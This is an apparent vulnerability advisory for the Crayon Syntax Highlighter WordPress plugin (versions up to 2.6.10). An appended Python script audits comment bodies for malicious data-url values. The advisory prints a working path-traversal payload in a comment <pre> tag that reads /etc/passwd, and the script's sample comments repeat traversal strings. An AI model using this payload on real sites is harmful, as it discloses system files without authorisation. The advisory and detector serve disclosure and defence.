Crayon Syntax Highlighter <= 2.6.10 - Local File Disclosure

2015-04-15T00:00:00
ID WPEX-ID:7904
Type wpexploit
Reporter Kevin Subileau
Modified 2019-10-21T00:00:00

Description

WordPress Vulnerability - Crayon Syntax Highlighter <= 2.6.10 - Local File Disclosure

For example, just by posting a comment containing the following code on a website using this plugin, an attacker could see the content of /etc/passwd:
<pre class="lang:php" data-url="/../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"></pre>
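
A defensive check for the issue described above, as an added example that is not part of the original advisory or the plugin's code: it audits comment bodies for <pre> tags whose data-url is not a plain http(s) URL or contains ".." segments. The policy in is_suspicious, the function names and the sample comments are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit


class PreDataUrlCollector(HTMLParser):
    """Collect data-url attribute values found on <pre> tags."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.values = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names and unescapes values.
        if tag == "pre":
            self.values += [v for k, v in attrs if k == "data-url" and v]


def is_suspicious(value):
    """Assumed policy: only absolute http(s) URLs with no '..' segment pass."""
    decoded = value
    for _ in range(3):  # peel up to three layers of percent-encoding
        decoded = unquote(decoded)
    try:
        parts = urlsplit(decoded)
    except ValueError:  # malformed URL: flag it for manual review
        return True
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return True  # local path or non-web scheme
    return ".." in parts.path.replace("\\", "/").split("/")


def audit_comment(body):
    """Return the data-url values in one comment body that need review."""
    collector = PreDataUrlCollector()
    collector.feed(body)
    collector.close()
    return [v for v in collector.values if is_suspicious(v)]


# Constructed sample comments (not taken from a real site).
SAMPLE_COMMENTS = [
    '<pre class="lang:php" data-url="/../../../etc/passwd"></pre>',
    '<pre class="lang:php" data-url="https://example.com/demo.php"></pre>',
    '<PRE data-url="https://example.com/%252e%252e/%2e%2e/etc/passwd"></PRE>',
    "Nice post, thanks for the write-up.",
]

if __name__ == "__main__":
    for number, body in enumerate(SAMPLE_COMMENTS, 1):
        print(number, audit_comment(body) or "ok")
```

Run over an export of comment bodies, any non-empty result marks a comment to review and remove before or after updating the plugin past 2.6.10.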